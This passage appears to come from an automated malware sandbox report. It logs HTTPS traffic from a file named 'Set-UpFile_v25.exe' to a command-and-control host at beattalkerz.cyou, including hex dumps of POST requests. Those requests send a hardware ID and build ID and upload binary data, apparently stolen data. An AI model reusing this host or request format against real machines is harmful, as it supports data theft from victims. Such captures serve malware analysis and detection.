                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 78
                                                                                                                                                              Host: beattalkerz.cyou
                                                                                                                                                              2025-01-07 13:37:12 UTC78OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37
                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--ZINA&j=637b55279021aab33278188cfa638397
                                                                                                                                                              2025-01-07 13:37:13 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 07 Jan 2025 13:37:13 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=8ovmel7fhkvpeptii6ae6ae8ea; expires=Sat, 03 May 2025 07:23:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YDUy2gI5cad%2FEcciy2UwWNzBuzuchQTm5mkOEYn43p%2FBYscYtYZqzx7DiCo9Oi9ehV8t7Q3hZaM3fzqiry8oko6tlOHnhKZ%2FxJPLfxhozV%2Fk5RP1uZAhYJAG7daQcZpvmLux"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8fe4575668750f49-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1987&min_rtt=1581&rtt_var=883&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=978&delivery_rate=1846932&cwnd=215&unsent_bytes=0&cid=0debd7473ca6caa9&ts=458&x=0"
                                                                                                                                                              2025-01-07 13:37:13 UTC246INData Raw: 34 66 32 34 0d 0a 4f 45 2b 41 32 78 32 2f 53 66 6d 38 45 34 4c 43 36 35 65 45 62 66 6b 2f 49 68 64 71 53 4b 70 68 52 50 6e 70 74 33 50 56 70 62 74 44 62 66 62 35 4a 34 74 6c 32 38 39 32 6f 50 69 66 35 66 45 49 31 52 31 44 63 30 68 79 7a 41 41 6f 69 6f 79 62 55 61 50 49 6d 51 49 70 34 62 64 75 32 6d 58 62 32 57 75 67 2b 4c 44 73 70 67 69 58 48 52 67 31 44 79 4c 49 41 43 69 62 69 4e 77 63 70 63 6e 59 55 43 50 6e 73 33 6a 63 4c 5a 6a 51 66 75 65 6e 6a 76 62 75 41 35 42 53 53 6e 70 49 5a 49 67 45 50 74 76 54 6c 54 36 77 30 64 70 31 4c 76 4f 77 50 38 4a 6c 67 70 35 32 37 4f 44 52 74 65 55 49 6d 31 4e 45 63 77 45 67 77 67 6b 67 6d 6f 33 64 41 37 7a 44 30 31 41 74 35 4c 4a 79 31 54 6d 56 32 6e 6e 73 6f 59 54 32 70 6b 48 62 57 6c 67 31
                                                                                                                                                              Data Ascii: 4f24OE+A2x2/Sfm8E4LC65eEbfk/IhdqSKphRPnpt3PVpbtDbfb5J4tl2892oPif5fEI1R1Dc0hyzAAoioybUaPImQIp4bdu2mXb2Wug+LDspgiXHRg1DyLIACibiNwcpcnYUCPns3jcLZjQfuenjvbuA5BSSnpIZIgEPtvTlT6w0dp1LvOwP8Jlgp527ODRteUIm1NEcwEgwgkgmo3dA7zD01At5LJy1TmV2nnsoYT2pkHbWlg1
                                                                                                                                                              2025-01-07 13:37:13 UTC1369INData Raw: 55 47 71 62 4d 53 57 4b 6d 73 41 63 70 38 47 5a 52 57 50 37 2b 58 6a 52 61 38 4f 65 65 65 79 75 6a 50 62 70 43 4a 70 64 55 6e 6f 49 4b 63 41 4c 49 70 47 45 32 68 36 35 7a 64 35 53 4a 4f 57 32 65 4e 55 74 6c 4e 30 78 72 75 43 4f 37 61 5a 58 32 33 31 51 64 67 73 2b 78 52 4a 6d 68 4d 58 4d 55 62 44 4c 6d 51 4a 74 35 4c 64 2b 30 43 75 4a 31 6e 72 72 70 5a 76 2b 37 77 4b 57 58 55 31 2f 42 79 6e 49 42 43 79 52 68 4e 38 56 75 73 72 66 57 69 32 69 39 7a 2f 61 4d 39 75 47 4d 63 4f 6c 6d 66 4c 71 47 64 6c 6e 41 47 70 47 4d 34 67 45 4b 74 76 54 6c 52 6d 79 78 4e 70 52 49 75 47 78 64 4d 38 72 69 64 68 38 35 62 4b 50 38 4f 67 46 6d 45 39 4b 65 77 34 70 77 51 67 76 6e 6f 7a 52 55 66 6d 48 33 6b 4a 74 75 76 6c 65 30 43 43 58 31 47 62 67 34 4a 61 37 2f 30 2b 63 55 51 41
                                                                                                                                                              Data Ascii: UGqbMSWKmsAcp8GZRWP7+XjRa8OeeeyujPbpCJpdUnoIKcALIpGE2h65zd5SJOW2eNUtlN0xruCO7aZX231Qdgs+xRJmhMXMUbDLmQJt5Ld+0CuJ1nrrpZv+7wKWXU1/BynIBCyRhN8VusrfWi2i9z/aM9uGMcOlmfLqGdlnAGpGM4gEKtvTlRmyxNpRIuGxdM8ridh85bKP8OgFmE9Kew4pwQgvnozRUfmH3kJtuvle0CCX1Gbg4Ja7/0+cUQA
                                                                                                                                                              2025-01-07 13:37:13 UTC1369INData Raw: 51 39 6d 31 63 76 53 43 66 65 66 6d 58 41 75 39 72 70 31 6e 78 36 59 30 48 2f 6e 74 73 6e 71 71 42 62 62 57 6b 77 31 55 47 72 46 41 69 36 64 6d 64 6f 63 74 4d 6e 58 56 53 6a 74 73 58 2f 64 4a 70 37 61 65 75 75 6a 68 50 48 30 42 5a 74 56 52 58 51 43 49 49 68 4e 5a 70 79 54 6c 55 6e 33 39 73 35 52 62 39 65 36 63 64 4d 73 6a 5a 35 75 72 72 6e 4a 38 75 70 50 77 78 31 4e 66 51 30 76 78 77 49 73 6c 59 37 66 48 62 2f 4a 32 6b 67 69 35 72 6c 7a 31 53 47 57 30 48 58 6f 71 59 4c 2b 34 41 2b 61 56 77 41 37 53 43 33 51 51 33 37 62 76 39 49 64 75 73 69 62 62 79 37 73 74 33 6a 4c 61 34 53 51 61 4b 43 6e 68 62 57 2b 54 35 64 55 51 48 34 43 4c 73 67 45 4b 35 36 49 30 68 4b 36 77 4e 4e 55 4b 75 61 31 64 74 41 74 6d 39 6c 31 35 62 4b 4d 2f 4f 6f 44 32 78 4d 41 63 68 42 71
                                                                                                                                                              Data Ascii: Q9m1cvSCfefmXAu9rp1nx6Y0H/ntsnqqBbbWkw1UGrFAi6dmdoctMnXVSjtsX/dJp7aeuujhPH0BZtVRXQCIIhNZpyTlUn39s5Rb9e6cdMsjZ5urrnJ8upPwx1NfQ0vxwIslY7fHb/J2kgi5rlz1SGW0HXoqYL+4A+aVwA7SC3QQ37bv9Idusibby7st3jLa4SQaKCnhbW+T5dUQH4CLsgEK56I0hK6wNNUKua1dtAtm9l15bKM/OoD2xMAchBq
                                                                                                                                                              2025-01-07 13:37:13 UTC1369INData Raw: 79 48 6c 55 6e 33 7a 74 42 49 49 2b 79 77 63 74 73 6a 6e 4e 42 38 36 36 61 43 38 75 45 4a 6c 6c 56 4e 63 41 73 72 7a 41 6b 30 6d 49 44 66 48 4c 32 48 6c 78 6f 71 2b 76 6b 6e 6e 51 79 58 39 32 48 37 73 70 2b 31 2b 55 47 43 48 55 64 35 53 48 4b 49 41 43 6d 53 68 4e 30 5a 75 4d 6a 64 56 43 76 6b 74 48 72 53 49 59 6e 57 66 2b 32 72 68 76 37 30 44 35 5a 5a 54 48 45 41 49 63 4a 44 61 4e 75 4d 7a 56 48 76 68 2b 78 58 49 75 4b 36 61 5a 30 30 31 63 63 78 35 36 7a 4a 72 61 59 44 6c 56 31 50 65 51 51 68 77 41 49 71 6c 59 7a 51 47 4c 2f 50 79 31 73 70 36 72 68 78 30 69 71 66 32 33 54 6b 70 34 33 7a 36 55 2f 56 48 55 64 74 53 48 4b 49 4c 41 47 75 79 66 51 72 39 39 69 58 51 32 33 6c 74 54 2b 46 61 35 66 64 66 65 69 76 6a 2f 7a 71 42 5a 4a 57 54 48 34 4d 4a 73 45 47 49
                                                                                                                                                              Data Ascii: yHlUn3ztBII+ywctsjnNB866aC8uEJllVNcAsrzAk0mIDfHL2Hlxoq+vknnQyX92H7sp+1+UGCHUd5SHKIACmShN0ZuMjdVCvktHrSIYnWf+2rhv70D5ZZTHEAIcJDaNuMzVHvh+xXIuK6aZ001ccx56zJraYDlV1PeQQhwAIqlYzQGL/Py1sp6rhx0iqf23Tkp43z6U/VHUdtSHKILAGuyfQr99iXQ23ltT+Fa5fdfeivj/zqBZJWTH4MJsEGI
                                                                                                                                                              2025-01-07 13:37:13 UTC1369INData Raw: 58 70 63 44 51 53 43 50 76 74 6e 66 56 49 70 72 61 64 4f 32 6d 68 66 2f 6e 43 4a 56 54 53 44 56 47 61 73 38 62 5a 73 50 4c 39 41 47 73 31 63 39 58 44 4f 2b 32 50 38 4a 6c 67 70 35 32 37 4f 44 52 74 65 38 64 6e 31 42 53 66 41 38 6b 78 77 41 30 6d 6f 62 65 41 37 44 49 33 56 30 68 35 4c 5a 35 33 43 36 52 30 6e 62 6c 71 34 62 35 70 6b 48 62 57 6c 67 31 55 47 72 6d 43 44 57 4d 69 4e 73 61 6f 64 79 5a 52 57 50 37 2b 58 6a 52 61 38 4f 65 63 75 75 72 6a 66 58 71 44 35 39 51 51 47 63 48 4c 63 38 4b 4c 59 6d 42 30 68 61 38 7a 39 4a 56 4b 2f 43 31 63 63 38 75 69 63 77 78 72 75 43 4f 37 61 5a 58 32 32 74 48 5a 52 67 70 69 6a 49 77 6d 4a 33 65 48 4c 75 48 78 68 51 30 6f 72 35 7a 6e 58 50 62 32 48 37 70 6f 34 62 30 37 77 4f 57 57 45 6c 77 43 53 7a 4d 43 53 79 62 6a 64
                                                                                                                                                              Data Ascii: XpcDQSCPvtnfVIpradO2mhf/nCJVTSDVGas8bZsPL9AGs1c9XDO+2P8Jlgp527ODRte8dn1BSfA8kxwA0mobeA7DI3V0h5LZ53C6R0nblq4b5pkHbWlg1UGrmCDWMiNsaodyZRWP7+XjRa8OecuurjfXqD59QQGcHLc8KLYmB0ha8z9JVK/C1cc8uicwxruCO7aZX22tHZRgpijIwmJ3eHLuHxhQ0or5znXPb2H7po4b07wOWWElwCSzMCSybjd
                                                                                                                                                              2025-01-07 13:37:13 UTC1369INData Raw: 77 42 6f 71 37 76 6b 6e 6e 53 69 63 33 58 44 71 71 59 58 36 34 51 75 4a 56 30 64 6e 43 53 76 44 44 69 71 62 68 74 67 62 74 73 37 55 56 69 44 6c 76 6e 44 59 61 39 57 65 64 76 6a 67 30 62 58 48 41 70 42 52 47 79 39 49 4e 59 59 61 5a 70 79 48 6c 55 6e 33 78 39 4e 66 4a 2b 2b 36 63 4e 34 35 6d 74 68 6a 34 4b 32 44 35 2b 77 45 6e 6c 42 4e 65 41 73 73 7a 67 67 71 69 59 4c 56 45 72 79 48 6c 78 6f 71 2b 76 6b 6e 6e 51 69 4d 79 48 76 6e 72 4a 2f 2b 35 77 79 4e 55 46 41 31 52 6d 72 5a 42 44 66 62 30 38 4d 42 6f 4d 44 47 46 44 53 69 76 6e 4f 64 63 39 76 59 65 4f 61 6e 6a 2f 76 30 43 70 31 53 54 33 77 42 4c 73 41 41 4a 70 2b 50 30 68 53 30 79 39 4a 64 4c 75 32 39 64 74 4d 69 6c 4a 34 2f 6f 4b 65 52 74 62 35 50 75 6b 5a 44 65 51 56 71 31 30 30 2f 32 34 7a 5a 55 65 2b
                                                                                                                                                              Data Ascii: wBoq7vknnSic3XDqqYX64QuJV0dnCSvDDiqbhtgbts7UViDlvnDYa9Wedvjg0bXHApBRGy9INYYaZpyHlUn3x9NfJ++6cN45mthj4K2D5+wEnlBNeAsszggqiYLVEryHlxoq+vknnQiMyHvnrJ/+5wyNUFA1RmrZBDfb08MBoMDGFDSivnOdc9vYeOanj/v0Cp1ST3wBLsAAJp+P0hS0y9JdLu29dtMilJ4/oKeRtb5PukZDeQVq100/24zZUe+
                                                                                                                                                              2025-01-07 13:37:13 UTC1369INData Raw: 63 4b 79 61 64 67 73 6a 5a 78 45 34 36 36 48 38 76 42 50 68 47 49 4f 4e 51 6c 71 6b 44 6f 2f 32 35 32 56 53 65 57 4a 6d 55 68 74 75 76 6b 34 33 6a 6d 4a 32 48 4c 32 6f 38 37 4c 32 43 69 4e 56 30 64 6c 44 7a 33 48 51 32 6a 62 68 4a 56 4a 6a 6f 66 51 58 54 62 7a 72 33 4c 4e 4c 4e 76 68 50 36 43 34 79 61 32 6d 4f 70 68 54 54 6e 49 65 4f 34 55 6b 4d 4a 47 4d 78 52 61 67 79 4a 6b 55 62 65 54 35 4a 34 35 6c 32 39 70 67 6f 50 6a 5a 70 37 31 61 79 41 6f 51 4a 78 64 6b 30 55 4d 77 32 39 4f 48 58 2f 66 56 6d 51 4a 74 70 62 70 74 7a 79 32 59 79 48 4b 6e 6e 72 66 53 2f 41 4b 64 53 6c 46 4c 4e 69 33 53 44 69 43 4d 6d 70 6b 45 74 4d 6e 58 58 54 75 69 39 7a 2f 53 61 38 50 6e 4d 61 6a 67 74 72 75 6d 46 39 73 46 41 45 41 4c 4a 4d 59 45 4d 49 72 47 38 67 75 36 77 63 35 4c
                                                                                                                                                              Data Ascii: cKyadgsjZxE466H8vBPhGIONQlqkDo/252VSeWJmUhtuvk43jmJ2HL2o87L2CiNV0dlDz3HQ2jbhJVJjofQXTbzr3LNLNvhP6C4ya2mOphTTnIeO4UkMJGMxRagyJkUbeT5J45l29pgoPjZp71ayAoQJxdk0UMw29OHX/fVmQJtpbptzy2YyHKnnrfS/AKdSlFLNi3SDiCMmpkEtMnXXTui9z/Sa8PnMajgtrumF9sFAEALJMYEMIrG8gu6wc5L
                                                                                                                                                              2025-01-07 13:37:13 UTC1369INData Raw: 2b 61 4b 49 6e 4d 64 2b 4f 32 69 72 4c 59 4d 62 78 54 52 33 51 65 4f 74 38 4d 47 4b 57 65 31 68 2b 35 77 4d 39 4c 62 61 7a 35 63 4a 31 7a 6f 70 34 35 6f 4a 2f 48 74 66 35 50 77 78 31 31 64 67 59 6b 7a 78 55 33 31 71 7a 62 46 72 62 52 79 55 30 69 6f 76 63 2f 32 32 76 44 6a 44 2b 67 70 4a 69 31 76 6c 2f 4a 42 68 55 6d 58 33 71 61 48 47 69 43 79 38 4e 52 37 35 57 58 47 6a 2b 69 34 54 2b 61 4b 49 6e 4d 64 2b 4f 32 69 72 4c 59 4d 62 78 54 52 33 51 65 4f 74 38 4d 61 62 57 39 39 43 2b 4a 30 74 70 55 49 2b 57 76 62 70 31 6c 32 39 45 78 75 4a 6e 4a 76 61 59 77 31 52 31 59 4e 56 42 71 2f 51 41 6f 6c 59 7a 44 41 50 72 67 31 31 30 73 39 4b 6c 6f 30 6d 53 31 36 46 43 67 37 73 6e 7a 70 6c 66 4a 45 77 42 78 47 57 71 51 55 33 54 41 33 6f 5a 47 35 35 58 47 46 44 53 69 72
                                                                                                                                                              Data Ascii: +aKInMd+O2irLYMbxTR3QeOt8MGKWe1h+5wM9Lbaz5cJ1zop45oJ/Htf5Pwx11dgYkzxU31qzbFrbRyU0iovc/22vDjD+gpJi1vl/JBhUmX3qaHGiCy8NR75WXGj+i4T+aKInMd+O2irLYMbxTR3QeOt8MabW99C+J0tpUI+Wvbp1l29ExuJnJvaYw1R1YNVBq/QAolYzDAPrg110s9Klo0mS16FCg7snzplfJEwBxGWqQU3TA3oZG55XGFDSir
                                                                                                                                                              2025-01-07 13:37:13 UTC1369INData Raw: 32 7a 48 62 77 6f 38 6d 37 70 67 50 62 42 51 42 34 47 69 33 59 41 47 71 63 6b 64 4a 52 71 49 6e 41 47 6a 75 69 34 53 79 54 61 34 6d 65 4b 61 44 6e 68 2f 6a 6e 44 4a 56 65 55 6d 63 4f 4b 64 34 41 59 61 57 31 2b 41 4f 77 31 39 6f 59 48 4f 2b 39 61 63 67 6f 69 39 6c 50 33 6f 32 62 38 76 59 4d 32 58 46 48 65 41 51 55 39 6a 51 33 6e 4a 75 58 4e 37 54 52 32 68 70 6a 6f 71 45 2f 68 57 75 32 7a 48 62 77 6f 38 76 5a 34 51 4b 58 48 56 38 37 45 57 72 65 51 33 37 49 78 5a 55 44 39 35 2b 5a 48 53 37 77 71 33 6e 65 50 5a 69 5a 54 39 36 4e 6d 2f 4c 32 44 4e 6c 73 54 58 45 65 50 38 73 54 49 61 57 31 2b 41 4f 77 31 39 6f 59 43 4e 6a 37 54 73 73 6f 6d 39 42 32 6f 4f 37 4a 37 61 5a 58 32 33 42 53 63 68 67 70 69 69 59 63 32 62 72 44 45 72 66 4a 33 68 70 6a 6f 72 55 2f 68 57
                                                                                                                                                              Data Ascii: 2zHbwo8m7pgPbBQB4Gi3YAGqckdJRqInAGjui4SyTa4meKaDnh/jnDJVeUmcOKd4AYaW1+AOw19oYHO+9acgoi9lP3o2b8vYM2XFHeAQU9jQ3nJuXN7TR2hpjoqE/hWu2zHbwo8vZ4QKXHV87EWreQ37IxZUD95+ZHS7wq3nePZiZT96Nm/L2DNlsTXEeP8sTIaW1+AOw19oYCNj7Tssom9B2oO7J7aZX23BSchgpiiYc2brDErfJ3hpjorU/hW


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              2192.168.2.449750104.21.25.524437272C:\Users\user\Desktop\Set-UpFile_v25.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2025-01-07 13:37:13 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: multipart/form-data; boundary=GEC2K66UIK1
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 18120
                                                                                                                                                              Host: beattalkerz.cyou
                                                                                                                                                              2025-01-07 13:37:13 UTC15331OUTData Raw: 2d 2d 47 45 43 32 4b 36 36 55 49 4b 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 37 37 31 46 30 30 33 35 30 46 44 30 31 37 42 33 33 36 34 32 44 41 36 30 38 39 35 36 46 46 31 0d 0a 2d 2d 47 45 43 32 4b 36 36 55 49 4b 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 45 43 32 4b 36 36 55 49 4b 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d 47 45 43 32 4b 36 36 55 49 4b 31 0d 0a 43 6f 6e 74 65
                                                                                                                                                              Data Ascii: --GEC2K66UIK1Content-Disposition: form-data; name="hwid"C771F00350FD017B33642DA608956FF1--GEC2K66UIK1Content-Disposition: form-data; name="pid"2--GEC2K66UIK1Content-Disposition: form-data; name="lid"hRjzG3--ZINA--GEC2K66UIK1Conte
                                                                                                                                                              2025-01-07 13:37:13 UTC2789OUTData Raw: 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c
                                                                                                                                                              Data Ascii: f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR
                                                                                                                                                              2025-01-07 13:37:14 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 07 Jan 2025 13:37:14 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=gn6tbn84j14igjqi6t13q672i4; expires=Sat, 03 May 2025 07:23:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=anuwvDI67Q4k88LKAkHxRZjnd1jftBFcSBiNrqPLM9GlBwOwjlKzfeiE5FyCRPZA1%2BR5%2BlqU87BzOchb0NS6J%2BxzYel2kEM%2F56gg7Qx2XNZ6h%2FPBsKYJ1ehhPYMk6hK9KGRZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8fe4575e4e0cf795-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1498&min_rtt=1498&rtt_var=562&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2838&recv_bytes=19075&delivery_rate=1946666&cwnd=187&unsent_bytes=0&cid=16a3eefb1a737626&ts=611&x=0"
                                                                                                                                                              2025-01-07 13:37:14 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                              2025-01-07 13:37:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              3192.168.2.449751104.21.25.524437272C:\Users\user\Desktop\Set-UpFile_v25.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2025-01-07 13:37:15 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: multipart/form-data; boundary=0J1ENAKYSQRTU5UCL
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 8777
                                                                                                                                                              Host: beattalkerz.cyou
                                                                                                                                                              2025-01-07 13:37:15 UTC8777OUTData Raw: 2d 2d 30 4a 31 45 4e 41 4b 59 53 51 52 54 55 35 55 43 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 37 37 31 46 30 30 33 35 30 46 44 30 31 37 42 33 33 36 34 32 44 41 36 30 38 39 35 36 46 46 31 0d 0a 2d 2d 30 4a 31 45 4e 41 4b 59 53 51 52 54 55 35 55 43 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 4a 31 45 4e 41 4b 59 53 51 52 54 55 35 55 43 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 5a 49 4e 41 0d 0a 2d 2d
                                                                                                                                                              Data Ascii: --0J1ENAKYSQRTU5UCLContent-Disposition: form-data; name="hwid"C771F00350FD017B33642DA608956FF1--0J1ENAKYSQRTU5UCLContent-Disposition: form-data; name="pid"2--0J1ENAKYSQRTU5UCLContent-Disposition: form-data; name="lid"hRjzG3--ZINA--
                                                                                                                                                              2025-01-07 13:37:15 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 07 Jan 2025 13:37:15 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: PHPSESSID=3l6q91cm9fkagubm7ok9qosgdv; expires=Sat, 03 May 2025 07:23:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                              vary: accept-encoding
                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9xM1SSYFDW3Lzji8GcyhREISAhS6n7PzUeO0aEaarRY1i6l8FiBE2y8jafR%2F%2BgFByjWnTnl7eNrC9ke06n1DXoTiHiBQWfJ38fPC6MwkTsDwe%2FQFSunS%2Bh4qd2Ma6xyVmzSa"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 8fe457660c8f8cb7-EWR
                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2004&min_rtt=2001&rtt_var=757&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2839&recv_bytes=9715&delivery_rate=1439132&cwnd=168&unsent_bytes=0&cid=5276a566c32babf3&ts=483&x=0"
                                                                                                                                                              2025-01-07 13:37:15 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                              2025-01-07 13:37:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              4192.168.2.449752104.21.25.524437272C:\Users\user\Desktop\Set-UpFile_v25.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2025-01-07 13:37:16 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: multipart/form-data; boundary=B7GDPGPLHYU
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                              Content-Length: 20394
                                                                                                                                                              Host: beattalkerz.cyou
